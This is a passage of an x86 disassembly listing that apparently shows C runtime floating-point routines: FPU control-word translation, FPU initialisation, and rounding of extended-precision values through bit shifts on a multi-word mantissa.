sub esp, 10h
push ebx
push esi
push edi
fstcw [ebp+var_10]
mov ax, [ebp+var_10]
push eax
call sub_428910
add esp, 4
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
mov edx, [ebp+arg_4]
not edx
mov eax, [ebp+var_8]
and eax, edx
or ecx, eax
mov [ebp+var_C], ecx
mov ecx, [ebp+var_C]
push ecx
call sub_428A90
add esp, 4
mov [ebp+var_4], ax
fldcw [ebp+var_4]
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_428840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428890 proc near ; CODE XREF: sub_422680+D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
and eax, 0FFF7FFFFh
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_428840
add esp, 8
pop ebp
retn
sub_428890 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
call sub_426B30
mov eax, [eax]
mov [ebp-4], eax
fninit
call sub_422680
cmp dword ptr [ebp-4], 0
jz short loc_428901
mov ecx, [ebp-4]
mov edx, [ecx+4]
mov eax, [edx]
and eax, 10008h
test eax, eax
jz short loc_428901
mov ecx, [ebp-4]
mov edx, [ecx+4]
add edx, 1Ch
mov [ebp-8], edx
mov eax, [ebp-8]
mov dword ptr [eax+4], 0
mov ecx, [ebp-8]
mov dword ptr [ecx+8], 0FFFFh
loc_428901: ; CODE XREF: .text:004288CE�j
; .text:004288DF�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428910 proc near ; CODE XREF: sub_428840+12�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 1
test eax, eax
jz short loc_428935
mov ecx, [ebp+var_4]
or ecx, 10h
mov [ebp+var_4], ecx
loc_428935: ; CODE XREF: sub_428910+1A�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 4
test edx, edx
jz short loc_42894D
mov eax, [ebp+var_4]
or al, 8
mov [ebp+var_4], eax
loc_42894D: ; CODE XREF: sub_428910+33�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 8
test ecx, ecx
jz short loc_428966
mov edx, [ebp+var_4]
or edx, 4
mov [ebp+var_4], edx
loc_428966: ; CODE XREF: sub_428910+4B�j
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 10h
test eax, eax
jz short loc_42897E
mov ecx, [ebp+var_4]
or ecx, 2
mov [ebp+var_4], ecx
loc_42897E: ; CODE XREF: sub_428910+63�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 20h
test edx, edx
jz short loc_428996
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
loc_428996: ; CODE XREF: sub_428910+7C�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 2
test ecx, ecx
jz short loc_4289B2
mov edx, [ebp+var_4]
or edx, 80000h
mov [ebp+var_4], edx
loc_4289B2: ; CODE XREF: sub_428910+94�j
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 0C00h
mov [ebp+var_8], eax
cmp [ebp+var_8], 800h
jg short loc_4289E5
cmp [ebp+var_8], 800h
jz short loc_4289F8
cmp [ebp+var_8], 0
jz short loc_4289F0
cmp [ebp+var_8], 400h
jz short loc_428A03
jmp short loc_428A17
; ---------------------------------------------------------------------------
loc_4289E5: ; CODE XREF: sub_428910+B9�j
cmp [ebp+var_8], 0C00h
jz short loc_428A0E
jmp short loc_428A17
; ---------------------------------------------------------------------------
loc_4289F0: ; CODE XREF: sub_428910+C8�j
mov ecx, [ebp+var_4]
mov [ebp+var_4], ecx
jmp short loc_428A17
; ---------------------------------------------------------------------------
loc_4289F8: ; CODE XREF: sub_428910+C2�j
mov edx, [ebp+var_4]
or dh, 2
mov [ebp+var_4], edx
jmp short loc_428A17
; ---------------------------------------------------------------------------
loc_428A03: ; CODE XREF: sub_428910+D1�j
mov eax, [ebp+var_4]
or ah, 1
mov [ebp+var_4], eax
jmp short loc_428A17
; ---------------------------------------------------------------------------
loc_428A0E: ; CODE XREF: sub_428910+DC�j
mov ecx, [ebp+var_4]
or ch, 3
mov [ebp+var_4], ecx
loc_428A17: ; CODE XREF: sub_428910+D3�j
; sub_428910+DE�j ...
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 300h
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jz short loc_428A59
cmp [ebp+var_C], 200h
jz short loc_428A4B
cmp [ebp+var_C], 300h
jz short loc_428A43
jmp short loc_428A65
; ---------------------------------------------------------------------------
loc_428A43: ; CODE XREF: sub_428910+12F�j
mov eax, [ebp+var_4]
mov [ebp+var_4], eax
jmp short loc_428A65
; ---------------------------------------------------------------------------
loc_428A4B: ; CODE XREF: sub_428910+126�j
mov ecx, [ebp+var_4]
or ecx, 10000h
mov [ebp+var_4], ecx
jmp short loc_428A65
; ---------------------------------------------------------------------------
loc_428A59: ; CODE XREF: sub_428910+11D�j
mov edx, [ebp+var_4]
or edx, 20000h
mov [ebp+var_4], edx
loc_428A65: ; CODE XREF: sub_428910+131�j
; sub_428910+139�j ...
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 1000h
test eax, eax
jz short loc_428A82
mov ecx, [ebp+var_4]
or ecx, 40000h
mov [ebp+var_4], ecx
loc_428A82: ; CODE XREF: sub_428910+164�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_428910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428A90 proc near ; CODE XREF: sub_428840+36�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
and eax, 10h
test eax, eax
jz short loc_428AB1
mov cx, [ebp+var_4]
or cl, 1
mov [ebp+var_4], cx
loc_428AB1: ; CODE XREF: sub_428A90+14�j
mov edx, [ebp+arg_0]
and edx, 8
test edx, edx
jz short loc_428AC5
mov ax, [ebp+var_4]
or al, 4
mov [ebp+var_4], ax
loc_428AC5: ; CODE XREF: sub_428A90+29�j
mov ecx, [ebp+arg_0]
and ecx, 4
test ecx, ecx
jz short loc_428ADA
mov dx, [ebp+var_4]
or dl, 8
mov [ebp+var_4], dx
loc_428ADA: ; CODE XREF: sub_428A90+3D�j
mov eax, [ebp+arg_0]
and eax, 2
test eax, eax
jz short loc_428AEF
mov cx, [ebp+var_4]
or cl, 10h
mov [ebp+var_4], cx
loc_428AEF: ; CODE XREF: sub_428A90+52�j
mov edx, [ebp+arg_0]
and edx, 1
test edx, edx
jz short loc_428B03
mov ax, [ebp+var_4]
or al, 20h
mov [ebp+var_4], ax
loc_428B03: ; CODE XREF: sub_428A90+67�j
mov ecx, [ebp+arg_0]
and ecx, 80000h
test ecx, ecx
jz short loc_428B1B
mov dx, [ebp+var_4]
or dl, 2
mov [ebp+var_4], dx
loc_428B1B: ; CODE XREF: sub_428A90+7E�j
mov eax, [ebp+arg_0]
and eax, 300h
mov [ebp+var_8], eax
cmp [ebp+var_8], 200h
ja short loc_428B49
cmp [ebp+var_8], 200h
jz short loc_428B5E
cmp [ebp+var_8], 0
jz short loc_428B54
cmp [ebp+var_8], 100h
jz short loc_428B6B
jmp short loc_428B83
; ---------------------------------------------------------------------------
loc_428B49: ; CODE XREF: sub_428A90+9D�j
cmp [ebp+var_8], 300h
jz short loc_428B78
jmp short loc_428B83
; ---------------------------------------------------------------------------
loc_428B54: ; CODE XREF: sub_428A90+AC�j
mov cx, [ebp+var_4]
mov [ebp+var_4], cx
jmp short loc_428B83
; ---------------------------------------------------------------------------
loc_428B5E: ; CODE XREF: sub_428A90+A6�j
mov dx, [ebp+var_4]
or dh, 8
mov [ebp+var_4], dx
jmp short loc_428B83
; ---------------------------------------------------------------------------
loc_428B6B: ; CODE XREF: sub_428A90+B5�j
mov ax, [ebp+var_4]
or ah, 4
mov [ebp+var_4], ax
jmp short loc_428B83
; ---------------------------------------------------------------------------
loc_428B78: ; CODE XREF: sub_428A90+C0�j
mov cx, [ebp+var_4]
or ch, 0Ch
mov [ebp+var_4], cx
loc_428B83: ; CODE XREF: sub_428A90+B7�j
; sub_428A90+C2�j ...
mov edx, [ebp+arg_0]
and edx, 30000h
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jz short loc_428BA9
cmp [ebp+var_C], 10000h
jz short loc_428BB6
cmp [ebp+var_C], 20000h
jz short loc_428BC3
jmp short loc_428BCB
; ---------------------------------------------------------------------------
loc_428BA9: ; CODE XREF: sub_428A90+103�j
mov ax, [ebp+var_4]
or ah, 3
mov [ebp+var_4], ax
jmp short loc_428BCB
; ---------------------------------------------------------------------------
loc_428BB6: ; CODE XREF: sub_428A90+10C�j
mov cx, [ebp+var_4]
or ch, 2
mov [ebp+var_4], cx
jmp short loc_428BCB
; ---------------------------------------------------------------------------
loc_428BC3: ; CODE XREF: sub_428A90+115�j
mov dx, [ebp+var_4]
mov [ebp+var_4], dx
loc_428BCB: ; CODE XREF: sub_428A90+117�j
; sub_428A90+124�j ...
mov eax, [ebp+arg_0]
and eax, 40000h
test eax, eax
jz short loc_428BE2
mov cx, [ebp+var_4]
or ch, 10h
mov [ebp+var_4], cx
loc_428BE2: ; CODE XREF: sub_428A90+145�j
mov ax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_428A90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428BF0 proc near ; CODE XREF: .text:00428810�p
; .text:00428831�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 1
test eax, eax
jz short loc_428C13
mov ecx, [ebp+var_4]
or ecx, 10h
mov [ebp+var_4], ecx
loc_428C13: ; CODE XREF: sub_428BF0+18�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 4
test edx, edx
jz short loc_428C2B
mov eax, [ebp+var_4]
or al, 8
mov [ebp+var_4], eax
loc_428C2B: ; CODE XREF: sub_428BF0+31�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 8
test ecx, ecx
jz short loc_428C44
mov edx, [ebp+var_4]
or edx, 4
mov [ebp+var_4], edx
loc_428C44: ; CODE XREF: sub_428BF0+49�j
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 10h
test eax, eax
jz short loc_428C5C
mov ecx, [ebp+var_4]
or ecx, 2
mov [ebp+var_4], ecx
loc_428C5C: ; CODE XREF: sub_428BF0+61�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 20h
test edx, edx
jz short loc_428C74
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
loc_428C74: ; CODE XREF: sub_428BF0+7A�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 2
test ecx, ecx
jz short loc_428C90
mov edx, [ebp+var_4]
or edx, 80000h
mov [ebp+var_4], edx
loc_428C90: ; CODE XREF: sub_428BF0+92�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_428BF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428CA0 proc near ; CODE XREF: sub_428DE0+70�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
and eax, 8000001Fh
jns short loc_428CC4
dec eax
or eax, 0FFFFFFE0h
inc eax
loc_428CC4: ; CODE XREF: sub_428CA0+1D�j
mov ecx, 1Fh
sub ecx, eax
mov [ebp+var_4], ecx
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
shl edx, cl
not edx
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
and edx, [ebp+var_8]
test edx, edx
jz short loc_428CEF
xor eax, eax
jmp short loc_428D20
; ---------------------------------------------------------------------------
loc_428CEF: ; CODE XREF: sub_428CA0+49�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_428D03
; ---------------------------------------------------------------------------
loc_428CFA: ; CODE XREF: sub_428CA0:loc_428D19�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_428D03: ; CODE XREF: sub_428CA0+58�j
cmp [ebp+var_C], 3
jge short loc_428D1B
mov edx, [ebp+var_C]
mov eax, [ebp+arg_0]
cmp dword ptr [eax+edx*4], 0
jz short loc_428D19
xor eax, eax
jmp short loc_428D20
; ---------------------------------------------------------------------------
loc_428D19: ; CODE XREF: sub_428CA0+73�j
jmp short loc_428CFA
; ---------------------------------------------------------------------------
loc_428D1B: ; CODE XREF: sub_428CA0+67�j
mov eax, 1
loc_428D20: ; CODE XREF: sub_428CA0+4D�j
; sub_428CA0+77�j
mov esp, ebp
pop ebp
retn
sub_428CA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428D30 proc near ; CODE XREF: sub_428DE0+84�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
and eax, 8000001Fh
jns short loc_428D54
dec eax
or eax, 0FFFFFFE0h
inc eax
loc_428D54: ; CODE XREF: sub_428D30+1D�j
mov ecx, 1Fh
sub ecx, eax
mov [ebp+var_4], ecx
mov edx, 1
mov ecx, [ebp+var_4]
shl edx, cl
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
lea edx, [ecx+eax*4]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4]
push eax
call sub_42C840
add esp, 0Ch
mov [ebp+var_10], eax
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_C], ecx
jmp short loc_428DA2
; ---------------------------------------------------------------------------
loc_428D99: ; CODE XREF: sub_428D30+9F�j
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_428DA2: ; CODE XREF: sub_428D30+67�j
cmp [ebp+var_C], 0
jl short loc_428DD1
cmp [ebp+var_10], 0
jz short loc_428DD1
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
lea edx, [ecx+eax*4]
push edx
push 1
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
push edx
call sub_42C840
add esp, 0Ch
mov [ebp+var_10], eax
jmp short loc_428D99
; ---------------------------------------------------------------------------
loc_428DD1: ; CODE XREF: sub_428D30+76�j
; sub_428D30+7C�j
mov eax, [ebp+var_10]
mov esp, ebp
pop ebp
retn
sub_428D30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428DE0 proc near ; CODE XREF: sub_429070+AB�p
; sub_429070+132�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_18], 0
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_14], eax
mov edx, [ebp+var_C]
and edx, 8000001Fh
jns short loc_428E1E
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_428E1E: ; CODE XREF: sub_428DE0+37�j
mov eax, 1Fh
sub eax, edx
mov [ebp+var_8], eax
mov edx, 1
mov ecx, [ebp+var_8]
shl edx, cl
mov [ebp+var_1C], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
and edx, [ebp+var_1C]
test edx, edx
jz short loc_428E6F
mov eax, [ebp+var_C]
add eax, 1
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_428CA0
add esp, 8
test eax, eax
jnz short loc_428E6F
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_428D30
add esp, 8
mov [ebp+var_18], eax
loc_428E6F: ; CODE XREF: sub_428DE0+63�j
; sub_428DE0+7A�j
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_8]
shl edx, cl
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4]
and eax, edx
mov ecx, [ebp+var_14]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
mov eax, [ebp+var_14]
add eax, 1
mov [ebp+var_10], eax
jmp short loc_428E9F
; ---------------------------------------------------------------------------
loc_428E96: ; CODE XREF: sub_428DE0+D2�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_428E9F: ; CODE XREF: sub_428DE0+B4�j
cmp [ebp+var_10], 3
jge short loc_428EB4
mov edx, [ebp+var_10]
mov eax, [ebp+arg_0]
mov dword ptr [eax+edx*4], 0
jmp short loc_428E96
; ---------------------------------------------------------------------------
loc_428EB4: ; CODE XREF: sub_428DE0+C3�j
mov eax, [ebp+var_18]
mov esp, ebp
pop ebp
retn
sub_428DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428EC0 proc near ; CODE XREF: sub_429070+98�p
; sub_429070+10F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
mov [ebp+var_C], 0
jmp short loc_428EE4
; ---------------------------------------------------------------------------
loc_428EDB: ; CODE XREF: sub_428EC0+46�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_428EE4: ; CODE XREF: sub_428EC0+19�j
cmp [ebp+var_C], 3
jge short loc_428F08
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
jmp short loc_428EDB
; ---------------------------------------------------------------------------
loc_428F08: ; CODE XREF: sub_428EC0+28�j
mov esp, ebp
pop ebp
retn
sub_428EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428F10 proc near ; CODE XREF: sub_429070+7C�p
; sub_429070+D5�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_428F26
; ---------------------------------------------------------------------------
loc_428F1D: ; CODE XREF: sub_428F10+29�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_428F26: ; CODE XREF: sub_428F10+B�j
cmp [ebp+var_4], 3
jge short loc_428F3B
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx*4], 0
jmp short loc_428F1D
; ---------------------------------------------------------------------------
loc_428F3B: ; CODE XREF: sub_428F10+1A�j
mov esp, ebp
pop ebp
retn
sub_428F10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428F40 proc near ; CODE XREF: sub_429070+63�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_428F56
; ---------------------------------------------------------------------------
loc_428F4D: ; CODE XREF: sub_428F40:loc_428F6C�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_428F56: ; CODE XREF: sub_428F40+B�j
cmp [ebp+var_4], 3
jge short loc_428F6E
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp dword ptr [edx+ecx*4], 0
jz short loc_428F6C
xor eax, eax
jmp short loc_428F73
; ---------------------------------------------------------------------------
loc_428F6C: ; CODE XREF: sub_428F40+26�j
jmp short loc_428F4D
; ---------------------------------------------------------------------------
loc_428F6E: ; CODE XREF: sub_428F40+1A�j
mov eax, 1
loc_428F73: ; CODE XREF: sub_428F40+2A�j
mov esp, ebp
pop ebp
retn
sub_428F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428F80 proc near ; CODE XREF: sub_429070+11F�p
; sub_429070+148�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_4]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_18], eax
mov eax, [ebp+arg_4]
and eax, 8000001Fh
jns short loc_428FA5
dec eax
or eax, 0FFFFFFE0h
inc eax
loc_428FA5: ; CODE XREF: sub_428F80+1E�j
mov [ebp+var_4], eax
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
shl edx, cl
not edx
mov [ebp+var_14], edx
mov [ebp+var_8], 0
mov [ebp+var_C], 0
jmp short loc_428FCE
; ---------------------------------------------------------------------------
loc_428FC5: ; CODE XREF: sub_428F80+9F�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_428FCE: ; CODE XREF: sub_428F80+43�j
cmp [ebp+var_C], 3
jge short loc_429021
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4]
and eax, [ebp+var_14]
mov [ebp+var_10], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4]
mov ecx, [ebp+var_4]
shr eax, cl
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
or edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+eax*4], edx
mov ecx, 20h
sub ecx, [ebp+var_4]
mov edx, [ebp+var_10]
shl edx, cl
mov [ebp+var_8], edx
jmp short loc_428FC5
; ---------------------------------------------------------------------------
loc_429021: ; CODE XREF: sub_428F80+52�j
mov [ebp+var_C], 2
jmp short loc_429033
; ---------------------------------------------------------------------------
loc_42902A: ; CODE XREF: sub_428F80:loc_429065�j
mov eax, [ebp+var_C]
sub eax, 1
mov [ebp+var_C], eax
loc_429033: ; CODE XREF: sub_428F80+A8�j
cmp [ebp+var_C], 0
jl short loc_429067
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_18]
jl short loc_429058
mov edx, [ebp+var_C]
sub edx, [ebp+var_18]
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4]
mov [ecx+eax*4], edx
jmp short loc_429065
; ---------------------------------------------------------------------------
loc_429058: ; CODE XREF: sub_428F80+BF�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+eax*4], 0
loc_429065: ; CODE XREF: sub_428F80+D6�j
jmp short loc_42902A
; ---------------------------------------------------------------------------
loc_429067: ; CODE XREF: sub_428F80+B7�j
pop esi
mov esp, ebp
pop ebp
retn
sub_428F80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429070 proc near ; CODE XREF: sub_4292C0+10�p
; sub_4292E0+10�p
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 34h
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax+0Ah]
and ecx, 7FFFh
sub ecx, 3FFFh
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx+0Ah]
and eax, 8000h
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+6]
mov [ebp+var_18], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+2]
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx]
shl eax, 10h
mov [ebp+var_10], eax
cmp [ebp+var_4], 0FFFFC001h
jnz short loc_429100
mov [ebp+var_8], 0
lea ecx, [ebp+var_18]
push ecx
call sub_428F40
add esp, 4
test eax, eax
jz short loc_4290E8
mov [ebp+var_1C], 0
jmp short loc_4290FB
; ---------------------------------------------------------------------------
loc_4290E8: ; CODE XREF: sub_429070+6D�j
lea edx, [ebp+var_18]
push edx
call sub_428F10
add esp, 4
mov [ebp+var_1C], 2
loc_4290FB: ; CODE XREF: sub_429070+76�j
jmp loc_42924C
; ---------------------------------------------------------------------------
loc_429100: ; CODE XREF: sub_429070+56�j
lea eax, [ebp+var_18]
push eax
lea ecx, [ebp+var_30]
push ecx
call sub_428EC0
add esp, 8
mov edx, [ebp+arg_8]
mov eax, [edx+8]
push eax
lea ecx, [ebp+var_18]
push ecx
call sub_428DE0
add esp, 8
test eax, eax
jz short loc_429130
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_429130: ; CODE XREF: sub_429070+B5�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov edx, [eax+4]
sub edx, [ecx+8]
cmp [ebp+var_4], edx
jge short loc_429160
lea eax, [ebp+var_18]
push eax
call sub_428F10
add esp, 4
mov [ebp+var_8], 0
mov [ebp+var_1C], 2
jmp loc_42924C
; ---------------------------------------------------------------------------
loc_429160: ; CODE XREF: sub_429070+CF�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
cmp edx, [ecx+4]
jg short loc_4291D0
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
sub ecx, [ebp+var_4]
mov [ebp+var_34], ecx
lea edx, [ebp+var_30]
push edx
lea eax, [ebp+var_18]
push eax
call sub_428EC0
add esp, 8
mov ecx, [ebp+var_34]
push ecx
lea edx, [ebp+var_18]
push edx
call sub_428F80
add esp, 8
mov eax, [ebp+arg_8]
mov ecx, [eax+8]
push ecx
lea edx, [ebp+var_18]
push edx
call sub_428DE0
add esp, 8
mov eax, [ebp+arg_8]
mov ecx, [eax+0Ch]
add ecx, 1
push ecx
lea edx, [ebp+var_18]
push edx
call sub_428F80
add esp, 8
mov [ebp+var_8], 0
mov [ebp+var_1C], 2
jmp short loc_42924C
; ---------------------------------------------------------------------------
loc_4291D0: ; CODE XREF: sub_429070+F9�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jl short loc_42921B
lea edx, [ebp+var_18]
push edx
call sub_428F10
add esp, 4
mov eax, [ebp+var_18]
or eax, 80000000h
mov [ebp+var_18], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
push edx
lea eax, [ebp+var_18]
push eax
call sub_428F80
add esp, 8
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+arg_8]
add edx, [eax+14h]
mov [ebp+var_8], edx
mov [ebp+var_1C], 1
jmp short loc_42924C
; ---------------------------------------------------------------------------
loc_42921B: ; CODE XREF: sub_429070+168�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
add edx, [ecx+14h]
mov [ebp+var_8], edx
mov eax, [ebp+var_18]
and eax, 7FFFFFFFh
mov [ebp+var_18], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
push edx
lea eax, [ebp+var_18]
push eax
call sub_428F80
add esp, 8
mov [ebp+var_1C], 0
loc_42924C: ; CODE XREF: sub_429070:loc_4290FB�j
; sub_429070+EB�j ...
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
add edx, 1
mov eax, 20h
sub eax, edx
mov [ebp+var_C], eax
mov edx, [ebp+var_8]
mov ecx, [ebp+var_C]
shl edx, cl
